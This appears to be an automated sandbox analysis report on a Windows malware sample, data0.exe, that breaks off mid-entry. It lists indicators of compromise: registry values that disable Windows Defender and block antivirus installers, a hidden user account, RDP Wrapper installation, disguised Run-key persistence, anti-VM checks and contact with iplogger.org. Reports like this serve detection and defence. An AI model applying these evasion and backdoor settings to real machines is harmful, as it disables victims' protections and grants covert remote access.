Analysis
-
max time kernel
139s -
max time network
143s -
platform
windows10-1703_x64 -
resource
win10-20240404-uk -
resource tags
arch:x64arch:x86image:win10-20240404-uklocale:uk-uaos:windows10-1703-x64systemwindows -
submitted
11-08-2024 23:24
Static task
static1
Behavioral task
behavioral1
Sample
data0.exe
Resource
win10-20240404-uk
Behavioral task
behavioral2
Sample
data0.exe
Resource
win10v2004-20240802-uk
General
-
Target
data0.exe
-
Size
107.5MB
-
MD5
582a7ccf130d82fd670e8f5bb03b115f
-
SHA1
a4bc2cb2296aa981cc4c10940e691cf7490d9759
-
SHA256
a653745c5da2c86b3ad137d82c20eb3f23a07e229362c068f0b01071cb448d53
-
SHA512
b01a22d3cfb0348c55babb4ae4a998f90da4920ac0ecc8ce57549fa20e550ac4740eccdba96ef379c754a0ae77e591be4a420ca5e732d0d98d1de59bee68c889
-
SSDEEP
3145728:4tfe2BYoE8uO/6t9yNNOnEok4GpEYr1TShId6/n:iWKk9yNNOE9luk1dda
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" GameGuard.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2" GameGuard.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" GameGuard.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" taskhost.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ taskhostw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ IP.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ GameGuard.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ update.exe -
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 2552 cmd.exe 5024 net.exe 2208 net1.exe -
Blocks application from running via registry modification 27 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\17 = "eset_internet_security_live_installer.exe" GameGuard.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "eset_nod32_antivirus_live_installer.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "AV_br.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "Cureit.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\25 = "TDSSKiller.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "AVbr.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\16 = "FRST64.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\20 = "MBSetup.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\23 = "drweb-12.0-ss-win.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KVRT.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\21 = "PANDAFREEAV.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\22 = "bitdefender_avfree.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "cureit.exe" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\18 = "esetonlinescanner.exe" GameGuard.exe Set value (int) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" GameGuard.exe Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" GameGuard.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts taskhostw.exe File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe -
Modifies Windows Firewall 2 TTPs 8 IoCs
pid Process 2216 netsh.exe 1156 netsh.exe 3492 netsh.exe 1388 netsh.exe 4752 netsh.exe 2696 netsh.exe 972 netsh.exe 4992 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWinst.exe -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GameGuard.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion IP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion IP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GameGuard.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion taskhostw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion taskhostw.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\International\Geo\Nation winserv.exe -
Executes dropped EXE 12 IoCs
pid Process 4632 GameGuard.exe 496 update.exe 4652 Game.exe 1996 taskhost.exe 4968 taskhostw.exe 5088 svchost.exe 856 IP.exe 2448 smss.exe 3468 winserv.exe 2232 winserv.exe 3920 Packs.exe 3952 RDPWinst.exe -
Loads dropped DLL 1 IoCs
pid Process 4156 svchost.exe -
Modifies file permissions 1 TTPs 28 IoCs
pid Process 3800 icacls.exe 2208 icacls.exe 4812 icacls.exe 4196 icacls.exe 4304 icacls.exe 4688 icacls.exe 292 icacls.exe 3520 icacls.exe 2068 icacls.exe 1524 icacls.exe 1148 icacls.exe 1396 icacls.exe 5040 icacls.exe 2704 icacls.exe 3688 icacls.exe 2216 icacls.exe 604 icacls.exe 4268 icacls.exe 1752 icacls.exe 576 icacls.exe 1748 icacls.exe 5040 icacls.exe 2060 icacls.exe 3420 icacls.exe 5012 icacls.exe 4372 icacls.exe 2960 icacls.exe 1592 icacls.exe -
resource yara_rule behavioral1/files/0x000800000001abd2-8.dat themida behavioral1/memory/4632-9-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp themida behavioral1/memory/4632-10-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp themida behavioral1/memory/4632-11-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp themida behavioral1/memory/4632-13-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp themida behavioral1/memory/4632-18-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp themida behavioral1/memory/4632-19-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp themida behavioral1/memory/4632-17-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp themida behavioral1/memory/4632-12-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp themida behavioral1/memory/496-21-0x00007FF774390000-0x00007FF775390000-memory.dmp themida behavioral1/memory/496-22-0x00007FF774390000-0x00007FF775390000-memory.dmp themida behavioral1/memory/496-20-0x00007FF774390000-0x00007FF775390000-memory.dmp themida behavioral1/memory/496-23-0x00007FF774390000-0x00007FF775390000-memory.dmp themida behavioral1/memory/496-25-0x00007FF774390000-0x00007FF775390000-memory.dmp themida behavioral1/memory/496-24-0x00007FF774390000-0x00007FF775390000-memory.dmp themida behavioral1/memory/496-28-0x00007FF774390000-0x00007FF775390000-memory.dmp themida behavioral1/memory/4632-27-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp themida behavioral1/memory/4632-38-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp themida behavioral1/memory/496-40-0x00007FF774390000-0x00007FF775390000-memory.dmp themida behavioral1/files/0x000900000001abe1-58.dat themida behavioral1/files/0x000700000001abe4-62.dat themida behavioral1/memory/1996-63-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp themida behavioral1/memory/1996-64-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp themida behavioral1/memory/1996-65-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp themida behavioral1/memory/1996-66-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp themida behavioral1/memory/4968-67-0x00007FF696010000-0x00007FF6990CF000-memory.dmp themida behavioral1/memory/4968-70-0x00007FF696010000-0x00007FF6990CF000-memory.dmp themida behavioral1/memory/1996-68-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp themida behavioral1/memory/1996-72-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp themida behavioral1/memory/1996-69-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp themida behavioral1/memory/4968-71-0x00007FF696010000-0x00007FF6990CF000-memory.dmp themida behavioral1/memory/4968-73-0x00007FF696010000-0x00007FF6990CF000-memory.dmp themida behavioral1/memory/4968-74-0x00007FF696010000-0x00007FF6990CF000-memory.dmp themida behavioral1/memory/4968-75-0x00007FF696010000-0x00007FF6990CF000-memory.dmp themida behavioral1/memory/4968-76-0x00007FF696010000-0x00007FF6990CF000-memory.dmp themida behavioral1/files/0x000900000001abe7-99.dat themida behavioral1/memory/856-107-0x00007FF676190000-0x00007FF676F3B000-memory.dmp themida behavioral1/memory/856-109-0x00007FF676190000-0x00007FF676F3B000-memory.dmp themida behavioral1/memory/856-106-0x00007FF676190000-0x00007FF676F3B000-memory.dmp themida behavioral1/memory/1996-104-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp themida behavioral1/memory/496-103-0x00007FF774390000-0x00007FF775390000-memory.dmp themida behavioral1/memory/856-108-0x00007FF676190000-0x00007FF676F3B000-memory.dmp themida behavioral1/memory/4968-105-0x00007FF696010000-0x00007FF6990CF000-memory.dmp themida behavioral1/memory/856-122-0x00007FF676190000-0x00007FF676F3B000-memory.dmp themida behavioral1/memory/856-121-0x00007FF676190000-0x00007FF676F3B000-memory.dmp themida behavioral1/memory/856-123-0x00007FF676190000-0x00007FF676F3B000-memory.dmp themida behavioral1/memory/856-288-0x00007FF676190000-0x00007FF676F3B000-memory.dmp themida behavioral1/memory/496-285-0x00007FF774390000-0x00007FF775390000-memory.dmp themida behavioral1/memory/1996-286-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp themida behavioral1/memory/4968-287-0x00007FF696010000-0x00007FF6990CF000-memory.dmp themida behavioral1/memory/856-308-0x00007FF676190000-0x00007FF676F3B000-memory.dmp themida behavioral1/memory/496-338-0x00007FF774390000-0x00007FF775390000-memory.dmp themida behavioral1/memory/1996-339-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp themida behavioral1/memory/4968-340-0x00007FF696010000-0x00007FF6990CF000-memory.dmp themida -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\ReaItekHD\\taskhostw.exe" taskhostw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" IP.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhostw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IP.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA GameGuard.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA update.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskhost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 iplogger.org 20 iplogger.org -
Modifies WinLogon 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList GameGuard.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" GameGuard.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWinst.exe -
AutoIT Executable 45 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/memory/4632-11-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp autoit_exe behavioral1/memory/4632-13-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp autoit_exe behavioral1/memory/4632-18-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp autoit_exe behavioral1/memory/4632-19-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp autoit_exe behavioral1/memory/4632-17-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp autoit_exe behavioral1/memory/4632-12-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp autoit_exe behavioral1/memory/496-21-0x00007FF774390000-0x00007FF775390000-memory.dmp autoit_exe behavioral1/memory/496-22-0x00007FF774390000-0x00007FF775390000-memory.dmp autoit_exe behavioral1/memory/496-23-0x00007FF774390000-0x00007FF775390000-memory.dmp autoit_exe behavioral1/memory/496-25-0x00007FF774390000-0x00007FF775390000-memory.dmp autoit_exe behavioral1/memory/496-24-0x00007FF774390000-0x00007FF775390000-memory.dmp autoit_exe behavioral1/memory/496-28-0x00007FF774390000-0x00007FF775390000-memory.dmp autoit_exe behavioral1/memory/4632-27-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp autoit_exe behavioral1/memory/4632-38-0x00007FF6BEB60000-0x00007FF6BFD6C000-memory.dmp autoit_exe behavioral1/memory/496-40-0x00007FF774390000-0x00007FF775390000-memory.dmp autoit_exe behavioral1/memory/1996-64-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp autoit_exe behavioral1/memory/1996-65-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp autoit_exe behavioral1/memory/1996-66-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp autoit_exe behavioral1/memory/4968-70-0x00007FF696010000-0x00007FF6990CF000-memory.dmp autoit_exe behavioral1/memory/1996-68-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp autoit_exe behavioral1/memory/1996-72-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp autoit_exe behavioral1/memory/1996-69-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp autoit_exe behavioral1/memory/4968-71-0x00007FF696010000-0x00007FF6990CF000-memory.dmp autoit_exe behavioral1/memory/4968-73-0x00007FF696010000-0x00007FF6990CF000-memory.dmp autoit_exe behavioral1/memory/4968-74-0x00007FF696010000-0x00007FF6990CF000-memory.dmp autoit_exe behavioral1/memory/4968-75-0x00007FF696010000-0x00007FF6990CF000-memory.dmp autoit_exe behavioral1/memory/4968-76-0x00007FF696010000-0x00007FF6990CF000-memory.dmp autoit_exe behavioral1/files/0x000700000001abe8-102.dat autoit_exe behavioral1/memory/856-107-0x00007FF676190000-0x00007FF676F3B000-memory.dmp autoit_exe behavioral1/memory/856-109-0x00007FF676190000-0x00007FF676F3B000-memory.dmp autoit_exe behavioral1/memory/1996-104-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp autoit_exe behavioral1/memory/496-103-0x00007FF774390000-0x00007FF775390000-memory.dmp autoit_exe behavioral1/memory/856-108-0x00007FF676190000-0x00007FF676F3B000-memory.dmp autoit_exe behavioral1/memory/4968-105-0x00007FF696010000-0x00007FF6990CF000-memory.dmp autoit_exe behavioral1/memory/856-122-0x00007FF676190000-0x00007FF676F3B000-memory.dmp autoit_exe behavioral1/memory/856-121-0x00007FF676190000-0x00007FF676F3B000-memory.dmp autoit_exe behavioral1/memory/856-123-0x00007FF676190000-0x00007FF676F3B000-memory.dmp autoit_exe behavioral1/memory/856-288-0x00007FF676190000-0x00007FF676F3B000-memory.dmp autoit_exe behavioral1/memory/496-285-0x00007FF774390000-0x00007FF775390000-memory.dmp autoit_exe behavioral1/memory/1996-286-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp autoit_exe behavioral1/memory/4968-287-0x00007FF696010000-0x00007FF6990CF000-memory.dmp autoit_exe behavioral1/memory/856-308-0x00007FF676190000-0x00007FF676F3B000-memory.dmp autoit_exe behavioral1/memory/496-338-0x00007FF774390000-0x00007FF775390000-memory.dmp autoit_exe behavioral1/memory/1996-339-0x00007FF7077E0000-0x00007FF70A346000-memory.dmp autoit_exe behavioral1/memory/4968-340-0x00007FF696010000-0x00007FF6990CF000-memory.dmp autoit_exe -
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" GameGuard.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 4632 GameGuard.exe 496 update.exe 1996 taskhost.exe 4968 taskhostw.exe 856 IP.exe -
Drops file in Program Files directory 8 IoCs
description ioc Process File opened for modification C:\Program Files\RDP Wrapper smss.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini smss.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWinst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWinst.exe File opened for modification C:\Program Files\ByteFence update.exe File opened for modification C:\Program Files (x86)\360 update.exe File opened for modification C:\Program Files (x86)\Microsoft JDX update.exe File created C:\Program Files\Common Files\System\iediagcmd.exe update.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\rescache\_merged\3623239459\11870838.pri winserv.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3224 sc.exe 1516 sc.exe 4224 sc.exe 4152 sc.exe 1388 sc.exe 2968 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Game.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Packs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWinst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language data0.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2928 timeout.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 4288 ipconfig.exe -
Modifies data under HKEY_USERS 33 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CEnvironmentsApp_cw5n1h2txyewy%5Cresources.pri\1d2a058e0b92f6f\a01460c8\@{EnvironmentsApp_10.0.15063.0_neutral__cw5n1h2txyewy?ms-resource://EnvironmentsApp/resource = "Windows Mixed Reality Environments" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@peerdistsh.dll,-10002 = "BranchCache Peer Discovery (WSD-In)" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@wifidisplay.dll,-10202 = "Wireless Display (TCP-Out)" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@peerdistsh.dll,-10003 = "BranchCache Peer Discovery (WSD-Out)" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@netlogon.dll,-1003 = "Netlogon Service (NP-In)" winserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@%systemroot%\system32\provsvc.dll,-207 = "HomeGroup Out (PNRP)" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@%systemroot%\system32\dosvc.dll,-103 = "Delivery Optimization (UDP-In)" winserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CEnvironmentsApp_cw5n1h2txyewy%5Cresources.pri\1d2a058e0b92f6f winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@%SystemRoot%\system32\firewallapi.dll,-37305 = "mDNS (UDP-Out)" winserv.exe Set value (str) 